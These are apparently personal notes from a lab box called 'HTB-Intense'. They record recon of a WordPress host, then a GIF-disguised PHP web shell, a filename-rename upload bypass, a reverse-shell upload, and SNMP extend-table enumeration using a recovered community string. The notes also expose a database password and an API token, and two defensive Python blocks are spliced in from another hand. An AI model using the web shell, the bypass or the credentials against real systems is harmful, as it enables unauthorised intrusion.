
SNMP: HTB-Intense

$ nmap -sC -sV -A -Pn 192.168.65.113


Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 15:53 EST
Nmap scan report for 192.168.65.113
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f0:85:61:65:d3:88:ad:49:6b:38:f4:ac:5b:90:4f:2d (RSA)
| 256 05:80:90:92:ff:9e:d6:0e:2f:70:37:6d:86:76:db:05 (ECDSA)
|_ 256 c3:57:35:b9:8a:a5:c0:f8:b1:b2:e9:73:09:ad:c7:9a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.5.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Escape – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds

@ http://192.168.65.113/

● No robots.txt
$ nikto -h 192.168.65.113
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.65.113
+ Target Hostname: 192.168.65.113
+ Target Port: 80
+ Start Time: 2020-11-17 16:00:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5b370ac710db3, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-11-17 16:19:18 (GMT-5) (1138 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

// @ http://192.168.140.113:8080/ -> too slow

● WordPress, user: admin


● robots.txt: @ http://192.168.65.113:8080/robots.txt
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Sitemap: http://192.168.120.163:8080/wp-sitemap.xml

$ nikto -h 192.168.65.113 -p 8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.65.113
+ Target Hostname: 192.168.65.113
+ Target Port: 8080
+ Start Time: 2020-11-17 16:04:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.65.113:8080/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ RFC-1918 IP address found in the 'link' header. The IP is "192.168.120.163".
+ Uncommon header 'link' found, with contents: <http://192.168.120.163:8080/wp-json/>; rel="https://api.w.org/"
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ /server-status: Apache server-status interface found (protected/forbidden)
+ 7919 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-11-17 16:26:04 (GMT-5) (1287 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
$ sudo wpscan --url http://192.168.140.113:8080 --enumerate ap,at,tt,cb,dbe,u,m --api-token PVFZh921eainmnPnfsEbWbtrlyHURINPNvvlKrSiY2Y
_______________________________________________________________
__ _______ _____
\\ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team


Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.140.113:8080/ [192.168.140.113]


[+] Started: Mon Nov 23 18:16:38 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.12
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.140.113:8080/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.140.113:8080/xmlrpc.php


| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.140.113:8080/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.140.113:8080/wp-cron.php


| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Latest, released on 2020-10-30).


| Found By: Emoji Settings (Passive Detection)
| - http://192.168.140.113:8080/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.140.113:8080/, Match: 'WordPress 5.5.3'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)


Checking Known Locations - Time: 00:14:00 <==========================> (21490 / 21490) 100.00% Time: 00:14:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] atom
| Location: http://192.168.140.113:8080/wp-content/themes/atom/
| Style URL: http://192.168.140.113:8080/wp-content/themes/atom/style.css
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/atom/, status: 200
|
| The version could not be determined.

[+] twentynineteen
| Location: http://192.168.140.113:8080/wp-content/themes/twentynineteen/
| Latest Version: 1.7 (up to date)
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://192.168.140.113:8080/wp-content/themes/twentynineteen/readme.txt
| Style URL: http://192.168.140.113:8080/wp-content/themes/twentynineteen/style.css
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentynineteen/, status: 500
|
| Version: 1.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentynineteen/style.css, Match: 'Version: 1.7'

[+] twentyseventeen
| Location: http://192.168.140.113:8080/wp-content/themes/twentyseventeen/
| Latest Version: 2.4 (up to date)
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://192.168.140.113:8080/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://192.168.140.113:8080/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 2.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.4'

[+] twentytwenty
| Location: http://192.168.140.113:8080/wp-content/themes/twentytwenty/
| Latest Version: 1.5 (up to date)
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://192.168.140.113:8080/wp-content/themes/twentytwenty/readme.txt
| Style URL: http://192.168.140.113:8080/wp-content/themes/twentytwenty/style.css
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentytwenty/, status: 500
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.5'

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)


Checking Known Locations - Time: 00:01:54 <============================> (2568 / 2568) 100.00% Time: 00:01:54

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)


Checking Config Backups - Time: 00:00:01 <=================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)


Checking DB Exports - Time: 00:00:02 <=====================================> (36 / 36) 100.00% Time: 00:00:02

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:05 <==========================> (100 / 100) 100.00% Time: 00:00:05

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)


Brute Forcing Author IDs - Time: 00:00:01 <================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.140.113:8080/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK


| Plan: free
| Requests Done (during the scan): 5
| Requests Remaining: 35

[+] Finished: Mon Nov 23 18:36:09 2020


[+] Requests Done: 24291
[+] Cached Requests: 11
[+] Data Sent: 6.083 MB
[+] Data Received: 8.195 MB
[+] Memory used: 265.477 MB
[+] Elapsed time: 00:19:30

$ gobuster dir -u http://192.168.65.113:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -q -x html,txt,php
/index.php (Status: 301)
/rss (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 200)
/atom (Status: 200)
/wp-content (Status: 301)
/admin (Status: 302)
/wp-login.php (Status: 200)
/rss2 (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/dev (Status: 301)
/wp-register.php (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 200)
/page1 (Status: 200)
/readme.html (Status: 200)
/robots.txt (Status: 200)
/' (Status: 301)
/dashboard (Status: 302)
...

@ http://192.168.65.113:8080/dev/

$ gobuster dir -u http://192.168.193.113:8080/dev -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -q -x html,txt,php
/index.php (Status: 200)
/rss (Status: 200)
/feed (Status: 200)
/uploads (Status: 301)
/atom (Status: 200)
/css (Status: 301)
/rss2 (Status: 200)
/wp-register.php (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 200)
/' (Status: 301)
...

// We can upload a gif file and view it


@ http://192.168.193.113:8080/dev/uploads/closed.gif
TODO: Can bypass file upload but cannot RCE

$ cat cmd.gif
GIF89a
<?php system($_GET['cmd']); ?>

// Upload “cmd.php.gif”, use Burp to capture the request, then change the filename to “cmd.php” and send the modified request
-> Successfully uploaded file “cmd.php”
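The rename trick above works because the server decides what to store from the client-supplied filename and the GIF89a header. As an added example, not code from the original notes or from the target application, the Python below puts a weak check of that kind next to a hardened one: the hardened version derives the extension from the validated magic bytes, rejects any dotted suffix outside an allow-list (so cmd.php.gif and cmd.php both fail), rejects image/script polyglots, and never reuses the client's filename. The allow-list, the marker list and the constructed sample bodies are assumptions.

```python
"""Weak vs. hardened server-side checks for an image upload.

Added example; not code from the original write-up or from the target site.
weak_check() models the class of bug abused above: it trusts the client's
filename and the magic bytes, so "cmd.php" with a GIF89a header is stored
as-is. hardened_check() never trusts the request for the stored name.
"""
import os
import secrets
from typing import Optional

ALLOWED_EXT = {".gif", ".png", ".jpg", ".jpeg"}          # assumption: image-only upload
MAGIC = {                                                # magic bytes -> canonical extension
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")   # image/script polyglot indicators


def detect_image_type(body: bytes) -> Optional[str]:
    """Extension implied by the magic bytes, or None if not a known image."""
    for magic, ext in MAGIC.items():
        if body.startswith(magic):
            return ext
    return None


def weak_check(filename: str, body: bytes) -> Optional[str]:
    """WEAK: magic bytes look like an image -> store under the client's name.
    A renamed 'cmd.php' with a GIF89a prefix passes and is later executed by PHP."""
    if detect_image_type(body) is None:
        return None
    return os.path.basename(filename)


def hardened_check(filename: str, body: bytes) -> Optional[str]:
    """HARDENED: returns a server-generated stored name, or None to reject."""
    detected = detect_image_type(body)
    if detected is None:
        return None                                       # not an image at all
    # Every dotted suffix of the client name must be allow-listed, so
    # "cmd.php.gif" (suffixes .php, .gif) is rejected, not just "cmd.php".
    parts = os.path.basename(filename).split(".")
    suffixes = ["." + s.lower() for s in parts[1:]]
    if not suffixes or any(s not in ALLOWED_EXT for s in suffixes):
        return None
    # Reject polyglots: a valid image header followed by script tags.
    lowered = body.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return None
    # Stored name is random and its extension comes from the content, never from
    # the request. The upload directory should also have script execution disabled.
    return secrets.token_hex(16) + detected


if __name__ == "__main__":
    # Constructed sample requests (not from the page); the "payload" comment stands
    # in for any script appended after a GIF header.
    gif = b"GIF89a" + b"\x00" * 16
    polyglot = b"GIF89a\n<?php /* payload */ ?>\n"
    for name, body in [("photo.gif", gif), ("cmd.php.gif", gif),
                       ("cmd.php", polyglot), ("cmd.gif", polyglot)]:
        print(f"{name:12} weak={weak_check(name, body)!s:12} hardened={hardened_check(name, body)}")
```

Extension and content checks alone are not enough on their own; the decisive control is that uploads are written under a server-chosen name into a directory the web server will not execute scripts from.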

// Now, we can run commands on webpage


@ http://192.168.149.113:8080/dev/uploads/cmd.php?cmd=id

// Cannot run a command to get the reverse shell from the webpage, even via Burp. So we upload php-reverse-shell.php the same way as above and get the shell.

// Trigger http://192.168.149.113:8080/dev/uploads/php-reverse-shell.php

// Cannot get a better shell, so we need to escape ???

// cannot go to /home, maybe there is no user for this box


$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

// Use curl to get linpeas.sh -> in a Docker container ???


/usr/local/bin/docker-entrypoint.sh

// Found DB_PASSWORD: W@rdpr355!!53cur3

// Find local.txt in /var/www

Local.txt: 166906be7b3f61c4495708cac61efc52

Need to escape the Docker container ???


// Install docker if needed
https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-18-04

/var/backups/.snmpd.conf
-> Found a word that looks like a password 53cur3M0NiT0riNg
// Interesting script: /usr/local/bin/docker-entrypoint.sh ???
// Cannot find mysql to access the wordpress database ???

$ cat /var/backups/.snmpd.conf
###############################################################################
#
# EXAMPLE.conf:
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See the 'snmpd.conf(5)' man page for details
#
# Some entries are deliberately commented out, and will need to be explicitly activated
#
###############################################################################
#
# AGENT BEHAVIOUR
#

# Listen for connections from the local system only
agentAddress udp:0.0.0.0:161
# Listen for connections on all interfaces (both IPv4 *and* IPv6)
#agentAddress udp:161,udp6:[::1]:161

###############################################################################
#
# SNMPv3 AUTHENTICATION
#
# Note that these particular settings don't actually belong here.
# They should be copied to the file /var/lib/snmp/snmpd.conf
# and the passwords changed, before being uncommented in that file *only*.
# Then restart the agent

# createUser authOnlyUser MD5 "remember to change this password"
# createUser authPrivUser SHA "remember to change this one too" DES
# createUser internalUser MD5 "this is only ever used internally, but still change the password"

# If you also change the usernames (which might be sensible),
# then remember to update the other occurances in this example config file to match.
###############################################################################
#
# ACCESS CONTROL
#

# system + hrSystem groups only
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1

# Full access from the local host
#rocommunity public localhost
# Default access to basic system info
rocommunity public default -V systemonly
# rocommunity6 is for IPv6
rocommunity6 public default -V systemonly

rocommunity 53cur3M0NiT0riNg
# Full access from an example network
# Adjust this network address to match your local
# settings, change the community string,
# and check the 'agentAddress' setting above
#rocommunity secret 10.0.0.0/16

# Full read-only access for SNMPv3
rouser authOnlyUser
# Full write access for encrypted requests
# Remember to activate the 'createUser' lines above
#rwuser authPrivUser priv

# It's no longer typically necessary to use the full 'com2sec/group/access' configuration
# r[ow]user and r[ow]community, together with suitable views, should cover most requirements

###############################################################################
#
# SYSTEM INFORMATION
#

# Note that setting these values here, results in the corresponding MIB objects being 'read-only'
# See snmpd.conf(5) for more details
sysLocation Sitting on the Dock of the Bay
sysContact Me <me@example.org>
# Application + End-to-End layers
sysServices 72
#
# Process Monitoring
#
# At least one 'mountd' process
proc mountd
# No more than 4 'ntalkd' processes - 0 is OK
proc ntalkd 4
# At least one 'sendmail' process, but no more than 10
proc sendmail 10 1

# Walk the UCD-SNMP-MIB::prTable to see the resulting output
# Note that this table will be empty if there are no "proc" entries in the snmpd.conf file

#
# Disk Monitoring
#
# 10MBs required on root disk, 5% free on /var, 10% free on all other disks
disk / 10000
disk /var 5%
includeAllDisks 10%

# Walk the UCD-SNMP-MIB::dskTable to see the resulting output
# Note that this table will be empty if there are no "disk" entries in the snmpd.conf file

#
# System Load
#
# Unacceptable 1-, 5-, and 15-minute load averages
load 12 10 5

# Walk the UCD-SNMP-MIB::laTable to see the resulting output
# Note that this table *will* be populated, even without a "load" entry in the snmpd.conf file

###############################################################################
#
# ACTIVE MONITORING
#

# send SNMPv1 traps
trapsink localhost public
# send SNMPv2c traps
#trap2sink localhost public
# send SNMPv2c INFORMs
#informsink localhost public

# Note that you typically only want *one* of these three lines
# Uncommenting two (or all three) will result in multiple copies of each notification.
#
# Event MIB - automatically generate alerts
#
# Remember to activate the 'createUser' lines above
iquerySecName internalUser
rouser internalUser
# generate traps on UCD error conditions
defaultMonitors yes
# generate traps on linkUp/Down
linkUpDownNotifications yes

###############################################################################
#
# EXTENDING THE AGENT
#

#
# Arbitrary extension commands
#
extend test1 /bin/echo Hello, world!
extend-sh test2 echo Hello, world! ; echo Hi there ; exit 35
extend-sh test3 /bin/sh /tmp/shtest

# Note that this last entry requires the script '/tmp/shtest' to be created first,
# containing the same three shell commands, before the line is uncommented

# Walk the NET-SNMP-EXTEND-MIB tables (nsExtendConfigTable, nsExtendOutput1Table
# and nsExtendOutput2Table) to see the resulting output

# Note that the "extend" directive supercedes the previous "exec" and "sh" directives
# However, walking the UCD-SNMP-MIB::extTable should still returns the same output,
# as well as the fuller results in the above tables.

#
# "Pass-through" MIB extension command
#
#pass .1.3.6.1.4.1.8072.2.255 /bin/sh PREFIX/local/passtest
#pass .1.3.6.1.4.1.8072.2.255 /usr/bin/perl PREFIX/local/passtest.pl

# Note that this requires one of the two 'passtest' scripts to be installed first,
# before the appropriate line is uncommented.
# These scripts can be found in the 'local' directory of the source distribution,
# and are not installed automatically.

# Walk the NET-SNMP-PASS-MIB::netSnmpPassExamples subtree to see the resulting output
#
# AgentX Sub-agents
#
# Run as an AgentX master agent
master agentx
# Listen for network connections (from localhost)
# rather than the default named socket /var/agentx/master
#agentXSocket tcp:localhost:705

Read more:
● https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e
● http://www.net-snmp.org/docs/man/snmpd.conf.html#lbAJ
● https://digi.ninja/blog/snmp_to_shell.php
● http://net-snmp.sourceforge.net/wiki/index.php/Tut:Extending_snmpd_using_shell_scripts
● https://book.hacktricks.xyz/pentesting/pentesting-snmp

SNMP: Simple Network Management Protocol which is a protocol to monitor and manage
network devices like modems, routers, servers, printers, IP cameras, UPS devices and
even power strips.

Access controls
There are two configuration directives, usually in /etc/snmp/snmpd.conf, called
rocommunity and rwcommunity.
● rocommunity — specifies the read-only community string
● rwcommunity — specifies the read-write community string
The SNMP community string is essentially a plaintext password that allows access to a
device’s statistics and configuration. That’s why you really should consider them as
passwords — make them long, unpredictable and be aware of what service or whom you
give them to.
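To make the access-control point concrete, here is an added audit script in Python (not from the original notes or from Net-SNMP) that reads an snmpd.conf and flags the weaknesses visible in the recovered backup above: well-known or short community strings, a community with no source restriction and no -V view (which is what exposes the extend tables to anyone holding the string), an agentAddress bound to all interfaces, and any extend/extend-sh/pass directive. SAMPLE_CONF is assembled from the active lines of that file; the severity labels, the well-known list and the 12-character threshold are my assumptions.

```python
"""Audit an snmpd.conf for the weaknesses visible in the recovered backup above.

Added example; not from the original notes or from Net-SNMP. Findings are
(line number, severity, message) tuples.
"""
import re
from typing import Iterator, List, Tuple

WELL_KNOWN = {"public", "private", "secret", "community", "snmp"}   # assumed list
COMMUNITY_DIRECTIVES = {"rocommunity", "rocommunity6", "rwcommunity", "rwcommunity6"}
EXEC_DIRECTIVES = {"extend", "extend-sh", "exec", "sh", "pass", "pass_persist"}
MIN_COMMUNITY_LEN = 12                                              # assumed threshold

# Constructed from the active (uncommented) lines of /var/backups/.snmpd.conf above.
SAMPLE_CONF = """\
agentAddress udp:0.0.0.0:161
view systemonly included .1.3.6.1.2.1.1
rocommunity public default -V systemonly
rocommunity6 public default -V systemonly
rocommunity 53cur3M0NiT0riNg
#rocommunity secret 10.0.0.0/16
rouser authOnlyUser
trapsink localhost public
extend test1 /bin/echo Hello, world!
extend-sh test2 echo Hello, world! ; echo Hi there ; exit 35
extend-sh test3 /bin/sh /tmp/shtest
master agentx
"""


def active_lines(conf: str) -> Iterator[Tuple[int, List[str]]]:
    """(lineno, tokens) for every line that is not blank or a comment."""
    for n, raw in enumerate(conf.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if line:
            yield n, line.split()


def audit_snmpd_conf(conf: str) -> List[Tuple[int, str, str]]:
    findings: List[Tuple[int, str, str]] = []
    for n, tok in active_lines(conf):
        d = tok[0].lower()
        if d == "agentaddress" and len(tok) > 1:
            # "udp:161" or "udp:0.0.0.0:161" both bind every interface.
            for ep in tok[1].split(","):
                if "0.0.0.0" in ep or re.fullmatch(r"(udp|tcp)6?:\d+|\d+", ep):
                    findings.append((n, "MEDIUM", f"agent listens on all interfaces: {ep}"))
        elif d in COMMUNITY_DIRECTIVES:
            community = tok[1] if len(tok) > 1 else ""
            source = tok[2] if len(tok) > 2 and tok[2] != "-V" else "default"
            restricted_view = "-V" in tok
            if community.lower() in WELL_KNOWN:
                findings.append((n, "HIGH", f"{d}: well-known community string {community!r}"))
            elif len(community) < MIN_COMMUNITY_LEN:
                findings.append((n, "MEDIUM", f"{d}: short community string ({len(community)} chars)"))
            if source in ("default", "0.0.0.0/0") and not restricted_view:
                # Full MIB view from anywhere: includes NET-SNMP-EXTEND-MIB when extend is configured.
                sev = "CRITICAL" if d.startswith("rw") else "HIGH"
                findings.append((n, sev, f"{d}: unrestricted source and full MIB view"))
        elif d in EXEC_DIRECTIVES:
            findings.append((n, "HIGH", f"{d}: command execution reachable over SNMP: {' '.join(tok[1:])}"))
        elif d in ("trapsink", "trap2sink", "informsink") and len(tok) > 2 and tok[2].lower() in WELL_KNOWN:
            findings.append((n, "LOW", f"{d}: notifications sent with well-known community {tok[2]!r}"))
    return findings


if __name__ == "__main__":
    for lineno, sev, msg in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {lineno:>3} [{sev}] {msg}")
```

On the sample, the line that matters most is `rocommunity 53cur3M0NiT0riNg`: the string itself is not weak, but without a source restriction or a -V view it grants the whole MIB, extend tables included, to any host that learns it.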
// Running this command from our Kali machine, we see some information as shown in the
config file
$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113

-> Ran for a while but still did not see STRING “Hello, world”

// Found another way to run commands and get their outputs, through the NET-SNMP-EXTEND-MIB module

Walk the NET-SNMP-EXTEND-MIB tables (nsExtendConfigTable, nsExtendOutput1Table and nsExtendOutput2Table) to see the resulting output

https://vincent.bernat.ch/en/blog/2012-extending-netsnmp
// Trying to run it gives errors
$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table

// Found the solution to install the missing modules
https://ixnfo.com/en/installing-mib-in-ubuntu-and-solving-the-error-snmp-cannot-find-module.html

$ sudo apt-get install snmp-mibs-downloader
$ sudo download-mibs
$ sudo sed -i "s/^\(mibs *:\).*/#\1/" /etc/snmp/snmp.conf
$ sudo service snmpd restart

// Rerun; now we see the STRING “Hello, world”

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test2" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test2" = STRING: Hello, world!
Hi there
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."test1" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."test2" = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."test3" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."test1" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendResult."test2" = INTEGER: 8960
NET-SNMP-EXTEND-MIB::nsExtendResult."test3" = INTEGER: 512

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113 NET-SNMP-EXTEND-MIB::nsExtendOutput2Table
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test1".1 = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test2".1 = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test2".2 = STRING: Hi there
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test3".1 = STRING:

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113 NET-SNMP-EXTEND-MIB::nsExtendConfigTable
NET-SNMP-EXTEND-MIB::nsExtendCommand."test1" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendCommand."test2" = STRING: echo
NET-SNMP-EXTEND-MIB::nsExtendCommand."test3" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendArgs."test2" = STRING: Hello, world! ; echo Hi there ; exit 35
NET-SNMP-EXTEND-MIB::nsExtendArgs."test3" = STRING: /tmp/shtest
NET-SNMP-EXTEND-MIB::nsExtendInput."test1" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."test2" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."test1" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."test2" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."test3" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."test1" = INTEGER: exec(1)
